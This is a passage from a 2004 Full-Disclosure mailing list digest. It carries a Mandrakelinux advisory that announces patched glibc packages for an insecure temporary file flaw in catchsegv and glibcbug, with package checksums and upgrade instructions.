         Neither FreeBSD nor Linux developers have been contacted yet!

-Xenzeo




------------------------------

Message: 15
Date: 30 Dec 2004 03:24:39 -0000
From: Mandrake Linux Security Team <security () linux-mandrake com>
Subject: [Full-disclosure] MDKSA-2004:159 - Updated glibc packages fix
        temporary file vulnerability
To: full-disclosure () lists netsys com
Message-ID: <20041230032439.10118.qmail () updates mandrakesoft com>



********************************************************************

This email may contain information which is privileged or confidential. If you are not the intended recipient of this 
email, please notify the sender immediately and delete it without reading, copying, storing, forwarding or disclosing 
its contents to any other person
Thank you

Check us out at http://www.bt.com/consulting

********************************************************************


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

                 Mandrakelinux Security Update Advisory
 _______________________________________________________________________

 Package name:           glibc
 Advisory ID:            MDKSA-2004:159
 Date:                   December 29th, 2004

 Affected versions:      10.0, 10.1
 ______________________________________________________________________

 Problem Description:

 The Trustix developers discovered that the catchsegv and glibcbug
 utilities, part of the glibc package, created temporary files in an
 insecure manner.  This could allow for a symlink attack to create or
 overwrite arbitrary files with the privileges of the user invoking the
 program.
 
 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0968
 ______________________________________________________________________

 Updated Packages:
  
 Mandrakelinux 10.0:
 d3c0d6fae4d7929830090e8c91466951  10.0/RPMS/glibc-2.3.3-12.8.100mdk.i586.rpm
 478aecbe69470a0466c0b6f685e63282
10.0/RPMS/glibc-debug-2.3.3-12.8.100mdk.i586.rpm
 29313f60b5702b00eb709781f47b2d39
10.0/RPMS/glibc-devel-2.3.3-12.8.100mdk.i586.rpm
 b4e97a220b40a2641bd3285bf2fc990d
10.0/RPMS/glibc-doc-2.3.3-12.8.100mdk.i586.rpm
 b360e6de9b0dc63a7360597b345eb113
10.0/RPMS/glibc-doc-pdf-2.3.3-12.8.100mdk.i586.rpm
 d40de60e1c3021267abe117bf2568b04
10.0/RPMS/glibc-i18ndata-2.3.3-12.8.100mdk.i586.rpm
 21965846712d7db2a19c581a4998dc8c
10.0/RPMS/glibc-profile-2.3.3-12.8.100mdk.i586.rpm
 1df7c34978d7f23e062e2145d75fcd94
10.0/RPMS/glibc-static-devel-2.3.3-12.8.100mdk.i586.rpm
 18cd827de946a15585316e1aedc7f516
10.0/RPMS/glibc-utils-2.3.3-12.8.100mdk.i586.rpm
 5556bc2a07cfb6c7596f8651709e26a3
10.0/RPMS/ldconfig-2.3.3-12.8.100mdk.i586.rpm
 78ada3afab77a2eb0bf69f22e6913a61
10.0/RPMS/nptl-devel-2.3.3-12.8.100mdk.i586.rpm
 33eb2a77406744a96f0b62ac99e6c6b5  10.0/RPMS/nscd-2.3.3-12.8.100mdk.i586.rpm
 e0f8c3de9f84b2a2517e9e436c9d78ad
10.0/RPMS/timezone-2.3.3-12.8.100mdk.i586.rpm
 29e42ae1c249e1e44676356d65e48e8c  10.0/SRPMS/glibc-2.3.3-12.8.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 8f497e10e0fdb577a98e836b599b6ba6
amd64/10.0/RPMS/glibc-2.3.3-12.8.100mdk.amd64.rpm
 85f8288b5b457e99d07157160ea57d99
amd64/10.0/RPMS/glibc-debug-2.3.3-12.8.100mdk.amd64.rpm
 24d3105e9a8604c24490d2f798d2d905
amd64/10.0/RPMS/glibc-devel-2.3.3-12.8.100mdk.amd64.rpm
 0ba375ae866a114ac133419b1fcd6977
amd64/10.0/RPMS/glibc-doc-2.3.3-12.8.100mdk.amd64.rpm
 240367c5128ac78428c67a84207892ec
amd64/10.0/RPMS/glibc-doc-pdf-2.3.3-12.8.100mdk.amd64.rpm
 fcdd0f7867c325e4e56282e8ee038cf5
amd64/10.0/RPMS/glibc-i18ndata-2.3.3-12.8.100mdk.amd64.rpm
 335c67618af7d5bc6ee78b535250fa32
amd64/10.0/RPMS/glibc-profile-2.3.3-12.8.100mdk.amd64.rpm
 f513e41b3c9cf834878e82a302031b94
amd64/10.0/RPMS/glibc-static-devel-2.3.3-12.8.100mdk.amd64.rpm
 5ecd5b9c15f28464ef1f0a7a42cb49e2
amd64/10.0/RPMS/glibc-utils-2.3.3-12.8.100mdk.amd64.rpm
 3f55bcf134eb71f267c0894a50cfc8ee
amd64/10.0/RPMS/ldconfig-2.3.3-12.8.100mdk.amd64.rpm
 1f64867fe40119309070d2f9cd33f274
amd64/10.0/RPMS/nptl-devel-2.3.3-12.8.100mdk.amd64.rpm
 1f93d5f94052b52a2b42c3f057b24a45
amd64/10.0/RPMS/nscd-2.3.3-12.8.100mdk.amd64.rpm
 a9f02cf82620c6e74341be95bd74b9b6
amd64/10.0/RPMS/timezone-2.3.3-12.8.100mdk.amd64.rpm
 29e42ae1c249e1e44676356d65e48e8c
amd64/10.0/SRPMS/glibc-2.3.3-12.8.100mdk.src.rpm

 Mandrakelinux 10.1:
 1bfd1552a89e67230d560837e8a52be8  10.1/RPMS/glibc-2.3.3-23.1.101mdk.i586.rpm
 feaefe712886221650ee11c17c2ee60c
10.1/RPMS/glibc-debug-2.3.3-23.1.101mdk.i586.rpm
 363152222d78953d66a1ab907422c362
10.1/RPMS/glibc-devel-2.3.3-23.1.101mdk.i586.rpm
 c396e0fa56bf99514947db942f603a93
10.1/RPMS/glibc-doc-2.3.3-23.1.101mdk.i586.rpm
 0af69cde9a1ee5a9880ab20a4084ec40
10.1/RPMS/glibc-doc-pdf-2.3.3-23.1.101mdk.i586.rpm
 36af3cda588047bdd0438ab99fc5172a
10.1/RPMS/glibc-i18ndata-2.3.3-23.1.101mdk.i586.rpm
 e2221cb00b488d72cf4c61302771a639
10.1/RPMS/glibc-profile-2.3.3-23.1.101mdk.i586.rpm
 c9eeea5047ce49a11299f038cce43cf2
10.1/RPMS/glibc-static-devel-2.3.3-23.1.101mdk.i586.rpm
 62d1c85236fdc348d5bb8ffc763d43ad
10.1/RPMS/glibc-utils-2.3.3-23.1.101mdk.i586.rpm
 db0df09231bf64cb7aa70c771e15599a
10.1/RPMS/ldconfig-2.3.3-23.1.101mdk.i586.rpm
 3aadb015bad4d08bbae72469836f4d05
10.1/RPMS/nptl-devel-2.3.3-23.1.101mdk.i586.rpm
 a5fcb4e74b84d4fc9d645652527e20d5  10.1/RPMS/nscd-2.3.3-23.1.101mdk.i586.rpm
 47d6540793020f021bfc9c0b9f3b2276
10.1/RPMS/timezone-2.3.3-23.1.101mdk.i586.rpm
 0734f25c465b9ebcf39180a6fdf44d53  10.1/SRPMS/glibc-2.3.3-23.1.101mdk.src.rpm

 Mandrakelinux 10.1/X86_64:
 387ea4a78ad359905011f180d821b258
x86_64/10.1/RPMS/glibc-2.3.3-23.1.101mdk.x86_64.rpm
 622a53d71f3ffdbd80b6adbec1a53d03
x86_64/10.1/RPMS/glibc-debug-2.3.3-23.1.101mdk.x86_64.rpm
 ecbf0ca4f665927cebef470f4b5b0aa2
x86_64/10.1/RPMS/glibc-devel-2.3.3-23.1.101mdk.x86_64.rpm
 bcc5d43efc32b2a3722ab8bac7c086fb
x86_64/10.1/RPMS/glibc-doc-2.3.3-23.1.101mdk.x86_64.rpm
 0650cc94e3ff7d3441e196875924ac9e
x86_64/10.1/RPMS/glibc-doc-pdf-2.3.3-23.1.101mdk.x86_64.rpm
 72b508b5295d72a8b96c3fe78efa6007
x86_64/10.1/RPMS/glibc-i18ndata-2.3.3-23.1.101mdk.x86_64.rpm
 e6a8a85bc80f481cbb9c2c29dd9ae1f6
x86_64/10.1/RPMS/glibc-profile-2.3.3-23.1.101mdk.x86_64.rpm
 545a8840739ae3716f6234868e5de16f
x86_64/10.1/RPMS/glibc-static-devel-2.3.3-23.1.101mdk.x86_64.rpm
 b396d0af7a534763db7359b26c950448
x86_64/10.1/RPMS/glibc-utils-2.3.3-23.1.101mdk.x86_64.rpm
 6fdedd56d68856e638fe1f6dcaea6f17
x86_64/10.1/RPMS/ldconfig-2.3.3-23.1.101mdk.x86_64.rpm
 e2ef0b1a4d2e492328a7d408878c13d7
x86_64/10.1/RPMS/nptl-devel-2.3.3-23.1.101mdk.x86_64.rpm
 37edf16413ba9f036ba5434f31832881
x86_64/10.1/RPMS/nscd-2.3.3-23.1.101mdk.x86_64.rpm
 68b7cdb358e9fbd38eba38dbb9216eed
x86_64/10.1/RPMS/timezone-2.3.3-23.1.101mdk.x86_64.rpm
 0734f25c465b9ebcf39180a6fdf44d53
x86_64/10.1/SRPMS/glibc-2.3.3-23.1.101mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security.  You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  <security linux-mandrake.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFB03T2mqjQ0CJFipgRAsGxAJ4w5MrLm/iq1meYV9yMg8sMbCHbrgCguhSR
l+3oHXol5pgiVuE/RyjXBH0=
=gAsH
-----END PGP SIGNATURE-----


------------------------------

_______________________________________________
Full-Disclosure mailing list
Full-Disclosure () lists netsys com
https://lists.netsys.com/mailman/listinfo/full-disclosure


End of Full-Disclosure Digest, Vol 1, Issue 2144
************************************************


********************************************************************

This email may contain information which is privileged or confidential. If you are not the intended recipient of this 
email, please notify the sender immediately and delete it without reading, copying, storing, forwarding or disclosing 
its contents to any other person
Thank you

Check us out at http://www.bt.com/consulting

********************************************************************


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
  • [Full-Disclosure] RE: Full-disclosure Digest, Vol 1, Issue 2144 steve.dangerfield (Dec 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]